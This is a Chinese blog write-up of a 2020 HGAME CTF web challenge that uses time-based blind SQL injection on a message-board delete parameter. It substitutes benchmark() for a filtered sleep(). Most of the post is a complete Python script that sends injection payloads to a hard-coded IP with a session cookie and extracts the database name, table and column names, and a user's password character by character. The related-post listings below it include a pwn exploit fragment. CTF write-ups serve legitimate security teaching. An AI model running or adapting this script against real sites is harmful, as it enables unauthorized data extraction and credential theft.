2020 HGAME WEB_Week3[cosmos的留言板-2](基于时间的盲注)

最新推荐文章于 2023-02-06 01:45:12 发布
最新推荐文章于 2023-02-06 01:45:12 发布
阅读量504 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43305301/article/details/104253248
版权

cosmos的留言板

涉及内容
SQL注入

打开页面,先常规操作一波,试试都有什么功能。
页面内容
在删除留言的时候发现URL有个参数是id,怀疑是注入点,测试一下发现确实是。
发现没有详细回显,简单测试以后感觉没有过滤,输入函数的话会被直接执行。
想到用时间盲注,先试了下用sleep()注入,结果发现返回时间没有变化,但是同位置放上其他函数会被执行,猜测sleep可能被处理了。
直接用这个玩意代替sleep:

benchmark(500000000,database())

也就是将database()函数执行500000000次。

然后直接爆破就可以了。直接贴脚本:
(别问我为什么写得又臭又长,问就是在家太无聊了)

import requests
import time


cookie = {'PHPSESSID': '80l2vg0sueib35cqha8bbphnkp'}
db_len = 1
while True:
    url_dblen = r"http://139.199.182.61:19999/index.php?method=delete&delete_id=if(length(database())%3d" + str(db_len) + ",benchmark(500000000,database()),1);+--+"
    start = time.time()
    response = requests.get(url_dblen, cookies=cookie)
    end = time.time()
    if end - start >= 4:
        print('db_len:', db_len)
        break
    db_len += 1

db_name =''
for len in range(1, db_len + 1):
    for asc in range(33, 127):
        url_dbnm = r"http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr(database()," + str(len) + ",1))%3d" + str(asc) + ",benchmark(500000000,database()),1);+--+"
        start = time.time()
        response = requests.get(url_dbnm, cookies=cookie)
        end = time.time()
        if end - start >= 4:
            db_name += chr(asc)
            break
print('db_name:',db_name)

tb_len = 1
while True:
    url_tblen = r"http://139.199.182.61:19999/index.php?method=delete&delete_id=if(length((select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3d'"+db_name+"'))%3d"+str(tb_len)+",benchmark(500000000,database()),1);+--+"
    start = time.time()
    response = requests.get(url_tblen, cookies=cookie)
    end = time.time()
    if end - start >= 4:
        print('tb_len:', tb_len)
        break
    tb_len += 1

tb_len = 13
db_name = 'babysql'
tb_name = ''
for len in range(1, tb_len + 1):
    for asc in range(33, 127):
        url_tbnm = r"http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3d'"+db_name+"')," + str(len) + ",1))%3d" + str(asc) + ",benchmark(500000000,database()),1);+--+"
        start = time.time()
        response = requests.get(url_tbnm, cookies=cookie)
        end = time.time()
        if end - start >= 4:
            tb_name += chr(asc)
            break
print("tb_name:", tb_name)

tb_name = 'user'
co_len = 1
while True:
    url_colen = r"http://139.199.182.61:19999/index.php?method=delete&delete_id=if(length((select+group_concat(column_name)+from+information_schema.columns+where+table_name%3d'"+tb_name+"'))%3d"+str(co_len)+",benchmark(500000000,database()),1);+--+"
    start = time.time()
    response = requests.get(url_colen, cookies=cookie)
    end = time.time()
    if end - start >= 4:
        print('co_len:', co_len)
        break
    co_len += 1

co_name = ''
co_len = 16
for len in range(1, co_len + 1):
    for asc in range(33, 127):
        url_conm = r"http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select+group_concat(column_name)+from+information_schema.columns+where+table_name%3d'"+tb_name+"')," + str(len) + ",1))%3d" + str(asc) + ",benchmark(500000000,database()),1);+--+"
        start = time.time()
        response = requests.get(url_conm, cookies=cookie)
        end = time.time()
        if end - start >= 4:
            co_name += chr(asc)
            break
print("co_name:", co_name)

co_name = 'password'
pswd_len = 1
while True:
    url_pswdlen = r"http://139.199.182.61:19999/index.php?method=delete&delete_id=if(length((select+group_concat(password)+from+user+where+name%3d'cosmos'))%3d"+str(pswd_len)+",benchmark(500000000,database()),1);+--+"
    start = time.time()
    response = requests.get(url_pswdlen, cookies=cookie)
    end = time.time()
    if end - start >= 4:
        print('pswd_len:', pswd_len)
        break
    pswd_len += 1

pswd_len = 28
pswd = ''
for len in range(1, pswd_len + 1):
    for asc in range(33, 127):
        url_pswd = r"http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select+password+from+user+where+name%3d'cosmos')," + str(len) + ",1))%3d" + str(asc) + ",benchmark(500000000,database()),1);+--+"
        start = time.time()
        response = requests.get(url_pswd, cookies=cookie)
        end = time.time()
        if end - start >= 4:
            pswd += chr(asc)
            break
print("pswd:", pswd)

其实就是一部分重复了好几遍,改几个字母就好了。
运行得到结果:
运行结果
直接登录就看到flag了。

kaleido76
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
HGAME2020 Cosmos的留言板-1
W3rsn
03-22 159
http://139.199.182.61/ 非常明显嘛,就是考SQL注入,先去information_schema里面获取一些基本信息。 经过反复横跳,发现它的过滤方式是这样的 也就是删除敏感字段,所以可以用套娃的方式绕过这个过滤,然后发现空格被过滤了。 这次玩玩SQLMAP吧 用的那两个脚本是针对它过滤规则的,space2randomb...
hgame-week3-web-wp
www_xuhss_com的博客
02-12 279
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 hgame第三周(web ak) 1.SecurityCenter 先看看hint(**vendor是第三方库和插件放置的文件夹,一般来源于composer的安装) 找到了使用的twig模板,应该是twig模板注入 查博客 依葫芦画瓢http://146.56.223.
Hgame-Week3
qq_53086690的博客
03-03 617
目录WebLazyDogR4UPost to zuckonit200OK!!Liki的生日礼物 Web LazyDogR4U 地址:http://718a753f92.lazy.r4u.top 提示:懒狗R4u把Flag藏起来了,但由于他是懒狗,所以flag藏的很不安全。 进入页面之后是登录页面,用子域名爆破工具进行爆破。发现有www.zip. 下载之后分析源代码。发现有flag.php。分析代码得出 $_SESSION[‘username’] === 'admin’就会得到flag。 然后再lazy页
hgame week3 kmusic(z3)
最新发布
qq_54894802的博客
02-06 169
比较特别的z3求解,简单的.net逆向
HGame 2023 Week3 部分Writeup
vvbbnn00的专栏
01-30 1054
本周在迎新春,走亲戚(真的很忙),外加题目难度增加,笔者比较菜,因此只解出了寥寥几题,不过姑且也算是一些成就,故作此题解,希望能够对各位读者有些帮助。Week3 比赛地址:https://hgame.vidar.club/contest/4。
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
hgame:Haskell 游戏引擎
05-30
【Hgame:Haskell游戏引擎】是一个开源项目,旨在利用Haskell这门纯函数式编程语言来构建高效、灵活的游戏开发框架。Haskell以其强大的类型系统、 lazy evaluation(惰性求值)特性以及对并行和并发的良好支持,为...
3D模型图片查看器(可查看3D程序模型)
11-03
在游戏领域,尤其是Hgame(成人游戏)中,3D模型的创建和展示是至关重要的,因为它们构成了游戏内的角色和环境。 描述中提到的“Hgame图片模型查看工具”表明这个查看器可能专门针对游戏行业内,特别是成人游戏的3D...
hgame2023 week3 writeup
02-03 1564
hgame2023 week3
hgame2021 week3 FAKE
__ys的博客
05-04 443
FAKE(SMC) 丢进IDA分析,找到check函数 发现是求解方程组,这里我们可以用z3约束器来求解,详细可以参考这两篇文章(文章1 文章2) python代码如下: from z3 import * s = Solver()#设置一个解方程的类Solver(必须要设置) v1,v2,v3,v4,v5,v6,v7,v8,v9,v10,v11,v12,v13,v14,v15,v16,v17,v18,v19,v20,v21,v22,v23,v24,v25,v26,v27,v28,v29,v30,v31,v
【wp】hgame2023 week3 Re&&Pwn
woodwhale的博客
02-01 818
hgame2023 week3 2个re和3个pwn的wp
hgame2021 week3 pwn刷题
qq_45595732的博客
02-21 401
blackgive 栈迁移 from pwn import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) #p = process('./blackgive') p =remote('182.92.108.71',30459) elf = ELF('./blackgive') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') puts_plt =
2020 HGAME WEB_Week3 [序列之争]
Kaleido76的博客
02-08 959
一道反序列化漏洞题目[序列之争]
HGAME 2020 web week3 writeup
stepone4ward的博客
02-07 845
序列之争-ordinal scale 首先source.zip获得源码,得知需要让rank为1即可获得flag 先找一下有没有反序列化的点,在monster类的构造函数中找到了unserialize方法 再找一下哪里可以让rank值变为1,在Rank类的析构函数中找到了让$_SESSION['rank']变为1的地方 如果我们可以满足$this->key === $this->serv...
2020 HGAME WEB_Week3 [二发入魂][cosmos的二手市场]
Kaleido76的博客
02-08 569
一道mt_rand()伪随机题目[二发入魂]和一道条件竞争题目[cosmos的二手市场]
HGAME2020 reverse maze
YenKoc的博客
02-05 803
1.查壳,发现是64位的linux文件,由于虚拟机没装linux,只能静态调了 2.拖入ida分析,找到主函数 2.1.思路分析 1.先将对应的ASCII的转换成字符,因为迷宫题一般都是用wsad,或者lrdt来标志上下左右 2.v5=&unk_6020c4,标志着起始点 3.v5+=4,意味着右边移动4个字节 4.v6+=64,有点像二维数组里面的用地址来访问这种。 5.if(v...
2020 HGAME WEB_Week2
Kaleido76的博客
02-02 1497
包含题目[Cosmos的博客后台][Cosmos的留言板][Cosmos的新语言][Cosmos的聊天室]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值